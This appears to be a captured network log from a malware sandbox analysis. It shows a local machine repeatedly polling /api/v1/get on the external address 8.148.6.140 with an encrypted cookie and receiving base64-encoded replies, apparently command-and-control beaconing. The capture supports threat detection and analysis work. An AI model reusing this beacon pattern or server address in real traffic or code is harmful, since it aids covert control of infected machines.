gFFbER4k3YFtZYe66Ozmoxp8sLkVFfmGW+x7nIv2j//95NLIUeN4Ji8Ib1D9MLrIVhGVQwpn2g1R1kBvxGAxQQZSou5PMAb+1pIyIwV9v3dPvrVB5BNZmnLUBmgaMmFBuk6cvuxUGL6G0lta2Z9m3R0D3VwAMHXD8YlB6Bp6gys6rNjs2qLpxNopqz8VkzDobCBUWpXLibEjrGOYKRq8fPya695aauExlmFJ6rc/NUn28d8/4TQfK3aFaf5cLw2g9Q/ffL0P5lfaiPZ8O7MPneEsfWqVd0lLBXaihKOaQ2ujXryE9lu511kb5lVX87UAVB6e2jUb7K+XA2qpGiEWyg==

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.6	50112	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:35.906119108 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:39.896015882 CET	465	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:39 GMT Server: nginx Content-Length: 280 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 55 73 59 62 69 32 2f 4e 30 58 71 6f 71 50 39 75 59 41 64 58 53 30 63 77 57 5a 73 54 7a 4b 75 37 2f 50 36 4e 64 43 67 31 39 48 66 53 4f 6f 31 57 56 36 4a 42 6c 33 73 75 6f 56 79 43 51 30 34 4f 30 79 76 65 32 74 6c 61 6a 78 76 59 75 30 56 53 47 4d 6f 50 72 73 5a 6b 4b 42 6b 43 67 39 4b 69 4d 54 36 64 74 4f 57 42 43 59 54 50 4c 57 34 69 4d 47 39 63 4b 5a 52 56 38 4c 34 49 34 36 37 4e 67 6e 61 71 42 42 77 4b 2f 6d 48 49 4f 35 33 38 4d 32 71 38 2b 34 73 61 78 50 6c 52 4f 62 61 58 4c 72 47 68 75 75 75 56 47 2f 49 6b 6a 42 4c 73 43 6e 74 39 52 50 41 65 4e 79 77 75 45 68 58 33 6a 32 61 76 56 76 7a 2b 54 4c 6d 34 43 61 32 4c 38 67 47 44 4b 61 42 35 45 2b 5a 47 45 36 76 68 5a 6d 2b 78 71 56 39 4c 54 6f 77 69 2b 6a 78 61 66 53 57 73 32 54 33 76 4a 39 45 4a 71 44 4a 52 47 72 52 63 33 54 2b 48 32 33 77 6f 6c 4c 7a 38 65 61 2f 33 43 77 3d 3d Data Ascii: UsYbi2/N0XqoqP9uYAdXS0cwWZsTzKu7/P6NdCg19HfSOo1WV6JBl3suoVyCQ04O0yve2tlajxvYu0VSGMoPrsZkKBkCg9KiMT6dtOWBCYTPLW4iMG9cKZRV8L4I467NgnaqBBwK/mHIO538M2q8+4saxPlRObaXLrGhuuuVG/IkjBLsCnt9RPAeNywuEhX3j2avVvz+TLm4Ca2L8gGDKaB5E+ZGE6vhZm+xqV9LTowi+jxafSWs2T3vJ9EJqDJRGrRc3T+H23wolLz8ea/3Cw==

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.6	50113	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:40.016556978 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:40.965547085 CET	529	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:40 GMT Server: nginx Content-Length: 344 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 4a 31 6c 79 4d 79 35 6f 74 56 43 49 62 54 76 42 77 7a 64 67 78 53 4c 67 34 46 35 33 6a 7a 70 5a 49 2b 62 58 74 64 33 6d 6b 31 74 66 36 52 55 33 4e 59 67 44 7a 78 48 47 30 6e 6d 54 7a 4f 50 56 55 58 59 67 52 39 7a 6d 69 44 6c 54 79 4b 31 37 43 71 4e 31 33 7a 76 59 33 47 6f 43 64 71 49 61 72 76 62 6f 2b 4a 39 4b 67 52 58 33 73 46 2b 42 68 4a 70 5a 66 51 45 6e 57 58 54 45 35 6a 51 4a 33 67 48 6b 50 79 2b 37 62 37 67 65 6b 52 75 69 4f 2f 74 4d 56 6a 4d 53 51 57 62 62 74 70 6f 43 55 66 31 4f 30 4b 4e 74 64 43 39 57 34 4e 61 59 6a 6f 35 45 68 74 4e 6a 7a 43 57 6b 32 57 50 51 4a 64 44 78 6b 31 2b 6c 45 6c 63 42 5a 2f 66 59 67 6b 32 72 49 63 53 51 6b 37 42 30 71 65 5a 6d 41 74 37 4b 57 79 30 35 67 4f 47 4d 4f 39 59 62 64 65 6f 6c 78 67 67 4a 35 71 44 55 4b 4c 2b 4a 6f 69 33 50 36 7a 52 6a 56 52 4b 77 72 6a 6f 32 49 65 75 51 59 53 79 50 70 57 58 2b 54 55 53 33 43 5a 64 74 34 48 65 51 6e 4b 32 71 2f 45 79 39 48 36 44 56 4a 50 4a 6e 79 32 73 70 48 69 69 67 4c 43 31 79 54 4f 37 38 67 5a 49 2f 2f 6e 49 54 31 41 [TRUNCATED] Data Ascii: J1lyMy5otVCIbTvBwzdgxSLg4F53jzpZI+bXtd3mk1tf6RU3NYgDzxHG0nmTzOPVUXYgR9zmiDlTyK17CqN13zvY3GoCdqIarvbo+J9KgRX3sF+BhJpZfQEnWXTE5jQJ3gHkPy+7b7gekRuiO/tMVjMSQWbbtpoCUf1O0KNtdC9W4NaYjo5EhtNjzCWk2WPQJdDxk1+lElcBZ/fYgk2rIcSQk7B0qeZmAt7KWy05gOGMO9YbdeolxggJ5qDUKL+Joi3P6zRjVRKwrjo2IeuQYSyPpWX+TUS3CZdt4HeQnK2q/Ey9H6DVJPJny2spHiigLC1yTO78gZI//nIT1Az7Fw==

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.6	50114	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:41.082988977 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:42.057889938 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:41 GMT Server: nginx Content-Length: 364 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:28:42.057915926 CET	364	IN	Data Raw: 65 2f 4f 4d 59 71 2f 43 6f 37 2b 4f 34 4b 70 31 47 73 70 59 66 4c 44 50 4c 70 6c 56 4a 30 7a 45 65 66 52 4f 70 4e 7a 6f 6f 54 46 6f 51 6c 71 38 6b 74 39 62 69 33 7a 45 4b 66 43 6f 43 67 71 51 44 62 48 51 34 32 2b 42 37 72 61 4d 52 47 51 75 71 34 Data Ascii: e/OMYq/Co7+O4Kp1GspYfLDPLplVJ0zEefROpNzooTFoQlq8kt9bi3zEKfCoCgqQDbHQ42+B7raMRGQuq4LcEBq5tJji4jOJfnbdjCiRAwLBoOujB1Nd5a7OBH8t/+KolgJZOjvmyTDrZ1pbzVR7VNc5QfkkyacoFaiFLT0Ezg1/9joTs4qxAUbLa6RnrSCGoNsI7WTZ/MPNFEAylWvvlY8YS1oLaezdy8pUalcCsuqY6EyL69h

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.6	50115	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:42.187005997 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:43.160495996 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:43 GMT Server: nginx Content-Length: 192 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:28:43.160594940 CET	192	IN	Data Raw: 41 78 4f 66 76 42 62 54 4b 7a 2f 2b 35 44 4e 32 4b 36 36 52 4e 5a 33 78 56 42 77 35 4c 57 50 49 65 75 4d 44 4d 65 2b 6c 32 53 4a 43 5a 4e 62 43 45 61 4e 4a 37 69 55 78 61 52 51 78 79 6b 57 54 37 38 70 67 41 63 30 37 73 77 6c 4a 52 5a 71 4a 6b 59 Data Ascii: AxOfvBbTKz/+5DN2K66RNZ3xVBw5LWPIeuMDMe+l2SJCZNbCEaNJ7iUxaRQxykWT78pgAc07swlJRZqJkY8y7ntdQHfNz480VG9YtXyHzqpnQZ141UniED5nWGIQKOW7J6jKUSeVPItkQzb4H1jRIYZduBm8ZxMa/pyys29KVG5McVufqh+jDhLjqMZQEd5z

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.6	50116	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:43.283855915 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:44.248059034 CET	465	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:44 GMT Server: nginx Content-Length: 280 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 39 37 44 31 39 54 7a 4e 43 2b 6b 66 70 74 61 34 6b 6e 43 37 39 7a 42 34 62 6e 66 4f 57 35 67 6f 4a 6a 73 75 67 54 30 78 35 4f 56 37 4d 79 65 42 4e 46 63 76 54 36 37 6e 44 42 52 6f 52 6e 66 4d 75 64 4f 53 33 36 46 45 65 54 58 78 4f 4d 35 6f 6c 42 64 49 77 67 54 51 75 53 4e 37 66 44 36 47 6a 72 48 6f 66 4f 52 7a 75 4e 41 4e 70 74 57 5a 4d 50 78 45 69 4f 41 4f 35 32 6d 31 66 6c 41 68 55 6a 77 35 36 79 79 57 45 73 77 68 45 4f 62 71 62 34 6e 6c 33 6c 6b 77 6b 43 4c 7a 6f 59 70 6e 79 6d 49 56 62 78 41 6b 6f 62 6d 6e 48 46 55 37 54 57 4d 67 65 63 33 6b 58 71 32 66 66 78 41 2f 4e 70 43 51 76 43 54 67 44 68 65 42 51 79 72 45 39 32 77 2b 4d 34 31 76 6a 66 79 32 44 61 42 4f 30 59 41 42 4d 4f 30 47 4b 41 4f 30 4c 5a 61 58 63 35 66 44 65 42 5a 7a 45 56 4b 38 38 71 64 31 63 59 6e 58 6d 64 4b 59 51 65 7a 4d 61 69 48 6a 41 45 6e 44 38 51 3d 3d Data Ascii: 97D19TzNC+kfpta4knC79zB4bnfOW5goJjsugT0x5OV7MyeBNFcvT67nDBRoRnfMudOS36FEeTXxOM5olBdIwgTQuSN7fD6GjrHofORzuNANptWZMPxEiOAO52m1flAhUjw56yyWEswhEObqb4nl3lkwkCLzoYpnymIVbxAkobmnHFU7TWMgec3kXq2ffxA/NpCQvCTgDheBQyrE92w+M41vjfy2DaBO0YABMO0GKAO0LZaXc5fDeBZzEVK88qd1cYnXmdKYQezMaiHjAEnD8Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.6	50117	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:44.368863106 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:45.325989008 CET	485	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:45 GMT Server: nginx Content-Length: 300 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 54 69 69 78 45 2b 4d 49 63 66 77 74 57 38 71 53 72 35 41 67 37 6f 47 69 5a 62 52 30 69 58 75 63 6b 4e 55 33 63 6d 2f 65 4a 72 58 4b 30 42 61 49 77 54 38 62 6f 61 6f 37 79 51 53 62 73 69 76 76 49 44 72 39 68 79 32 6b 41 4a 2b 69 67 72 7a 56 74 54 32 64 59 6f 54 78 35 71 41 38 38 63 52 49 70 37 46 7a 33 36 4a 53 52 55 54 65 30 52 50 6e 65 50 44 7a 71 56 42 64 43 56 4b 62 50 37 42 76 6f 52 4d 48 37 6d 51 6e 44 72 6c 69 67 54 65 4c 41 34 46 75 70 6d 6d 4e 2f 4f 53 72 4f 68 52 76 66 50 56 6b 6c 70 78 4c 2b 74 4b 56 58 6d 6c 48 49 53 41 7a 4f 75 6d 4a 4d 66 52 47 4b 44 57 2f 37 53 68 67 50 78 43 38 70 68 4a 6e 38 54 76 48 58 49 6b 72 50 65 69 66 44 67 6d 4f 69 2b 47 4a 4e 4e 54 7a 73 46 63 48 74 4e 31 71 6e 41 41 69 51 42 4d 32 71 52 7a 71 73 54 64 43 54 4f 52 56 49 4d 47 71 52 47 51 43 74 4b 46 53 50 75 31 33 31 63 71 6a 2f 62 6c 6d 41 70 59 68 72 47 35 53 44 6e 41 32 57 62 63 36 51 7a 67 3d Data Ascii: TiixE+MIcfwtW8qSr5Ag7oGiZbR0iXuckNU3cm/eJrXK0BaIwT8boao7yQSbsivvIDr9hy2kAJ+igrzVtT2dYoTx5qA88cRIp7Fz36JSRUTe0RPnePDzqVBdCVKbP7BvoRMH7mQnDrligTeLA4FupmmN/OSrOhRvfPVklpxL+tKVXmlHISAzOumJMfRGKDW/7ShgPxC8phJn8TvHXIkrPeifDgmOi+GJNNTzsFcHtN1qnAAiQBM2qRzqsTdCTORVIMGqRGQCtKFSPu131cqj/blmApYhrG5SDnA2Wbc6Qzg=

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.6	50118	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:45.437031984 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.6	50119	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:49.562189102 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:50.534225941 CET	505	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:50 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 30 56 77 49 37 72 66 58 44 2f 35 62 43 79 79 69 71 42 6d 31 77 75 4b 49 7a 39 39 64 71 4e 7a 32 59 33 75 31 52 68 4c 66 50 30 69 2b 4e 6a 6b 35 57 4c 58 57 51 75 33 6d 52 68 68 63 2f 50 52 57 6c 78 6e 63 68 53 31 62 2b 34 70 2b 51 69 4e 67 50 61 2f 4f 78 4d 48 31 64 6e 34 72 2f 59 76 53 68 79 63 31 4c 37 42 4a 53 35 66 7a 68 79 78 4f 48 4e 77 51 50 57 49 6b 4c 79 65 4d 68 59 41 75 4c 56 42 30 2f 4d 4e 6b 4b 6f 66 65 2f 6c 77 2f 56 36 36 53 34 64 5a 53 38 50 75 70 30 49 71 32 63 2f 38 73 53 35 33 35 6a 44 33 35 78 4e 2f 50 6f 45 58 66 48 67 69 62 58 74 57 47 4b 38 4e 65 39 4a 7a 6f 33 36 71 67 75 6f 6d 41 38 61 33 75 38 38 55 35 71 72 58 57 70 63 58 44 71 75 6a 6d 6e 50 78 53 56 77 6b 58 4a 52 72 55 53 4d 51 2b 6b 4d 6f 47 73 33 75 62 38 36 54 6e 51 35 4c 70 58 5a 76 36 55 74 33 38 37 6c 4a 7a 35 47 48 69 48 54 51 79 6d 52 46 6e 52 66 59 4a 38 6d 78 53 79 63 34 62 66 38 78 44 69 51 5a 63 5a 2b 74 6e 4b 68 61 63 66 7a 53 31 65 39 4b 74 6b 4c 35 79 Data Ascii: 0VwI7rfXD/5bCyyiqBm1wuKIz99dqNz2Y3u1RhLfP0i+Njk5WLXWQu3mRhhc/PRWlxnchS1b+4p+QiNgPa/OxMH1dn4r/YvShyc1L7BJS5fzhyxOHNwQPWIkLyeMhYAuLVB0/MNkKofe/lw/V66S4dZS8Pup0Iq2c/8sS535jD35xN/PoEXfHgibXtWGK8Ne9Jzo36qguomA8a3u88U5qrXWpcXDqujmnPxSVwkXJRrUSMQ+kMoGs3ub86TnQ5LpXZv6Ut387lJz5GHiHTQymRFnRfYJ8mxSyc4bf8xDiQZcZ+tnKhacfzS1e9KtkL5y

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.6	50120	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:50.659215927 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:51.627871990 CET	421	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:51 GMT Server: nginx Content-Length: 236 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 72 62 4d 66 43 42 55 55 48 63 46 51 30 72 2b 54 73 51 55 41 7a 32 5a 64 49 2f 6d 7a 67 51 6d 37 4a 62 6d 73 51 6f 74 4b 67 42 43 51 6f 70 63 72 6a 41 67 45 4e 76 4d 61 50 63 35 2b 69 67 65 54 47 43 35 66 30 4c 57 36 48 42 42 59 65 48 4c 77 66 7a 4a 57 76 43 69 73 64 76 4e 2f 50 53 57 4e 73 31 7a 41 47 50 61 4a 45 2b 78 6b 73 2b 64 4f 2b 62 73 77 46 41 43 34 6c 74 43 4c 6b 6d 56 57 4a 4b 30 67 76 77 77 63 7a 50 34 4f 35 67 77 55 4a 6c 59 4f 61 2b 66 66 31 6a 2f 75 6e 73 6e 59 4f 72 6e 59 69 74 78 4a 75 38 4c 63 77 49 4b 51 67 35 4f 4f 30 61 43 6a 42 36 73 4d 33 6f 66 78 73 47 47 6a 54 4d 61 48 6a 37 7a 5a 65 4d 71 79 62 51 6d 71 50 45 32 52 76 63 4a 6d 41 58 5a 44 79 34 2b 41 6a 5a 38 39 76 41 38 3d Data Ascii: rbMfCBUUHcFQ0r+TsQUAz2ZdI/mzgQm7JbmsQotKgBCQopcrjAgENvMaPc5+igeTGC5f0LW6HBBYeHLwfzJWvCisdvN/PSWNs1zAGPaJE+xks+dO+bswFAC4ltCLkmVWJK0gvwwczP4O5gwUJlYOa+ff1j/unsnYOrnYitxJu8LcwIKQg5OO0aCjB6sM3ofxsGGjTMaHj7zZeMqybQmqPE2RvcJmAXZDy4+AjZ89vA8=

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.6	50121	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:51.749761105 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.6	50122	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:55.860958099 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:56.808726072 CET	549	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:56 GMT Server: nginx Content-Length: 364 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 33 64 45 76 37 45 62 68 48 76 56 4a 4b 45 4e 47 62 65 32 6a 75 50 66 62 44 35 2f 2f 51 45 6c 45 49 6b 33 54 4b 6b 38 63 53 69 69 65 4a 4f 4c 54 73 42 69 37 33 79 48 38 49 4e 68 53 4c 30 35 75 51 2f 38 61 79 37 61 6e 43 4b 58 2f 65 70 31 77 62 75 48 51 6f 51 55 62 36 59 46 72 4e 30 49 43 56 32 78 31 33 51 4f 73 46 4d 6f 53 37 77 41 4e 2f 69 65 33 36 39 48 30 74 6a 2f 59 72 72 32 37 37 41 2b 42 2b 5a 6d 57 35 7a 47 48 70 57 4c 4e 31 42 44 43 4b 46 5a 73 53 53 32 41 77 42 6a 30 6e 44 62 57 73 2b 32 47 62 6e 70 76 44 79 6e 76 2f 2b 47 41 45 36 55 31 68 4d 63 74 37 58 71 5a 64 4b 68 63 48 6f 66 65 41 6a 6d 66 52 43 54 56 71 45 55 76 43 7a 65 63 61 6a 6c 36 65 6e 4f 6b 30 75 35 5a 56 53 46 53 77 68 37 4a 6c 48 33 58 41 39 67 67 43 70 79 48 34 77 59 2b 46 69 7a 50 57 69 49 53 66 36 2b 58 77 4a 53 64 79 6c 33 44 4a 56 4c 72 53 37 2b 4b 45 6a 4d 6b 69 64 36 75 31 33 50 42 79 74 78 67 77 48 33 6e 72 70 55 62 6a 52 2b 42 75 68 68 61 71 68 69 4f 73 75 56 52 4e 72 61 45 57 6f 50 64 63 46 38 37 66 55 54 48 7a 4a [TRUNCATED] Data Ascii: 3dEv7EbhHvVJKENGbe2juPfbD5//QElEIk3TKk8cSiieJOLTsBi73yH8INhSL05uQ/8ay7anCKX/ep1wbuHQoQUb6YFrN0ICV2x13QOsFMoS7wAN/ie369H0tj/Yrr277A+B+ZmW5zGHpWLN1BDCKFZsSS2AwBj0nDbWs+2GbnpvDynv/+GAE6U1hMct7XqZdKhcHofeAjmfRCTVqEUvCzecajl6enOk0u5ZVSFSwh7JlH3XA9ggCpyH4wY+FizPWiISf6+XwJSdyl3DJVLrS7+KEjMkid6u13PBytxgwH3nrpUbjR+BuhhaqhiOsuVRNraEWoPdcF87fUTHzJhvTHwVwZVy0qMYqIPR1MIgWmI=

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.6	50123	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:56.927175045 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
